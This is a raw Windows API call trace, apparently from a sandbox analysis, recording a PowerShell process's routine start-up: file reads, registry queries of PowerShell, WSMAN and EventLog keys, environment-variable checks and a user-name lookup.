	[0318.605] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.606] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0318.606] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0xe98, lpOverlapped=0x0) returned 1
	[0318.606] ReadFile (in: hFile=0x330, lpBuffer=0x3198988, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3198988*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.606] ReadFile (in: hFile=0x330, lpBuffer=0x3199388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cceb8, lpOverlapped=0x0 | out: lpBuffer=0x3199388*, lpNumberOfBytesRead=0x1cceb8*=0x0, lpOverlapped=0x0) returned 1
	[0318.606] SetErrorMode (uMode=0x1) returned 0x1
	[0318.606] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cce60 | out: lpFileInformation=0x1cce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0318.606] SetErrorMode (uMode=0x1) returned 0x1
	[0318.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0318.606] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ccf48 | out: phkResult=0x1ccf48*=0x330) returned 0x0
	[0318.606] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccecc, lpData=0x0, lpcbData=0x1ccec8*=0x0 | out: lpType=0x1ccecc*=0x1, lpData=0x0, lpcbData=0x1ccec8*=0x56) returned 0x0
	[0318.606] CoTaskMemAlloc (cb=0x5a) returned 0x31b710
	[0318.606] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce9c, lpData=0x31b710, lpcbData=0x1cce98*=0x56 | out: lpType=0x1cce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cce98*=0x56) returned 0x0
	[0318.607] CoTaskMemFree (pv=0x31b710) 
	[0318.607] RegCloseKey (hKey=0x330) returned 0x0
	[0318.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0318.607] VirtualQuery (in: lpAddress=0x1cb9e0, lpBuffer=0x1cc8a0, dwLength=0x30 | out: lpBuffer=0x1cc8a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.607] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x78764e37, Data2=0x7d37, Data3=0x4be5, Data4=([0]=0x9e, [1]=0xd2, [2]=0x73, [3]=0xd0, [4]=0xc5, [5]=0x84, [6]=0xa5, [7]=0x64))) returned 0x0
	[0318.607] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x8faf6941, Data2=0x8e7a, Data3=0x461c, Data4=([0]=0x96, [1]=0xa2, [2]=0x7f, [3]=0x68, [4]=0x35, [5]=0x47, [6]=0x5c, [7]=0xe0))) returned 0x0
	[0318.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0318.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0318.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0318.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0318.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0318.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0318.934] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.934] CoTaskMemFree (pv=0x2a1430) 
	[0318.935] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.935] CoTaskMemFree (pv=0x2a1430) 
	[0318.936] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.936] CoTaskMemFree (pv=0x2a1430) 
	[0318.938] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.938] CoTaskMemFree (pv=0x2a1430) 
	[0318.947] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.948] CoTaskMemFree (pv=0x2a1430) 
	[0318.948] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.948] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.949] CoTaskMemFree (pv=0x2a1430) 
	[0318.949] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0318.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.949] CoTaskMemFree (pv=0x2a1430) 
	[0318.953] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd158 | out: phkResult=0x1cd158*=0x330) returned 0x0
	[0318.954] RegQueryInfoKeyW (in: hKey=0x330, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd05c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd058*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0318.954] CoTaskMemFree (pv=0x0) 
	[0318.954] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0318.954] RegEnumValueW (in: hKey=0x330, dwIndex=0x0, lpValueName=0x2a92a0, lpcchValueName=0x1cd108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0318.954] CoTaskMemFree (pv=0x2a92a0) 
	[0318.955] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0318.955] RegEnumValueW (in: hKey=0x330, dwIndex=0x1, lpValueName=0x2a92a0, lpcchValueName=0x1cd108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0318.955] CoTaskMemFree (pv=0x2a92a0) 
	[0318.955] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0318.955] RegEnumValueW (in: hKey=0x330, dwIndex=0x2, lpValueName=0x2a92a0, lpcchValueName=0x1cd108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0318.955] CoTaskMemFree (pv=0x2a92a0) 
	[0318.955] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd0ec, lpData=0x0, lpcbData=0x1cd0e8*=0x0 | out: lpType=0x1cd0ec*=0x1, lpData=0x0, lpcbData=0x1cd0e8*=0x8) returned 0x0
	[0318.955] CoTaskMemAlloc (cb=0xc) returned 0x309410
	[0318.955] RegQueryValueExW (in: hKey=0x330, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd0bc, lpData=0x309410, lpcbData=0x1cd0b8*=0x8 | out: lpType=0x1cd0bc*=0x1, lpData="2.0", lpcbData=0x1cd0b8*=0x8) returned 0x0
	[0318.955] CoTaskMemFree (pv=0x309410) 
	[0319.735] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0a8 | out: phkResult=0x1cd0a8*=0x308) returned 0x0
	[0319.735] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccfac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccfa8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccfac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccfa8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.735] CoTaskMemFree (pv=0x0) 
	[0319.735] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.735] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x2a92a0, lpcchValueName=0x1cd058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.735] CoTaskMemFree (pv=0x2a92a0) 
	[0319.735] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.735] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x2a92a0, lpcchValueName=0x1cd058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.735] CoTaskMemFree (pv=0x2a92a0) 
	[0319.735] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.735] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x2a92a0, lpcchValueName=0x1cd058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0319.735] CoTaskMemFree (pv=0x2a92a0) 
	[0319.735] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd03c, lpData=0x0, lpcbData=0x1cd038*=0x0 | out: lpType=0x1cd03c*=0x1, lpData=0x0, lpcbData=0x1cd038*=0x8) returned 0x0
	[0319.735] CoTaskMemAlloc (cb=0xc) returned 0x309010
	[0319.735] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd00c, lpData=0x309010, lpcbData=0x1cd008*=0x8 | out: lpType=0x1cd00c*=0x1, lpData="2.0", lpcbData=0x1cd008*=0x8) returned 0x0
	[0319.736] CoTaskMemFree (pv=0x309010) 
	[0319.737] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0319.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.737] CoTaskMemFree (pv=0x2a1430) 
	[0319.742] CoTaskMemAlloc (cb=0x104) returned 0x2a1430
	[0319.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0319.742] CoTaskMemFree (pv=0x2a1430) 
	[0319.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd0d8 | out: phkResult=0x1cd0d8*=0x30c) returned 0x0
	[0319.751] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd04c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd048, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd04c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd048*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.751] CoTaskMemFree (pv=0x0) 
	[0319.752] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.752] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.752] CoTaskMemFree (pv=0x2a92a0) 
	[0319.752] CoTaskMemFree (pv=0x0) 
	[0319.752] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.752] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.752] CoTaskMemFree (pv=0x2a92a0) 
	[0319.752] CoTaskMemFree (pv=0x0) 
	[0319.752] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.752] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.752] CoTaskMemFree (pv=0x2a92a0) 
	[0319.752] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.753] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.753] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.753] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.753] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.753] CoTaskMemFree (pv=0x0) 
	[0319.753] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0319.753] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x2a92a0, lpcchName=0x1cd0d8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd0d8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0319.753] CoTaskMemFree (pv=0x2a92a0) 
	[0319.754] CoTaskMemFree (pv=0x0) 
	[0319.754] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x310) returned 0x0
	[0319.754] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.754] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x1d4) returned 0x0
	[0319.754] RegOpenKeyExW (in: hKey=0x1d4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.754] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x334) returned 0x0
	[0319.754] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.754] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x338) returned 0x0
	[0319.754] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.754] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x33c) returned 0x0
	[0319.754] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.755] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x340) returned 0x0
	[0319.755] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.755] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x344) returned 0x0
	[0319.755] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.755] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x348) returned 0x0
	[0319.755] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x0) returned 0x2
	[0319.755] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x34c) returned 0x0
	[0319.755] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd138 | out: phkResult=0x1cd138*=0x350) returned 0x0
	[0319.755] RegCloseKey (hKey=0x350) returned 0x0
	[0319.755] RegCloseKey (hKey=0x30c) returned 0x0
	[0320.210] RegCloseKey (hKey=0x34c) returned 0x0
	[0320.223] CoTaskMemAlloc (cb=0x804) returned 0x1b7434c0
	[0320.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7434c0, nSize=0x1cd348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd348) returned 0x1
	[0320.225] CoTaskMemFree (pv=0x1b7434c0) 
	[0320.226] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.226] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd388) returned 1
	[0320.226] CoTaskMemFree (pv=0x2a92a0) 
	[0320.697] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd088 | out: phkResult=0x1cd088*=0x354) returned 0x0
	[0320.697] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ccffc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccff8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ccffc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ccff8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.697] CoTaskMemFree (pv=0x0) 
	[0320.697] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0320.697] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x2a92a0, lpcchName=0x1cd088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0320.697] CoTaskMemFree (pv=0x2a92a0) 
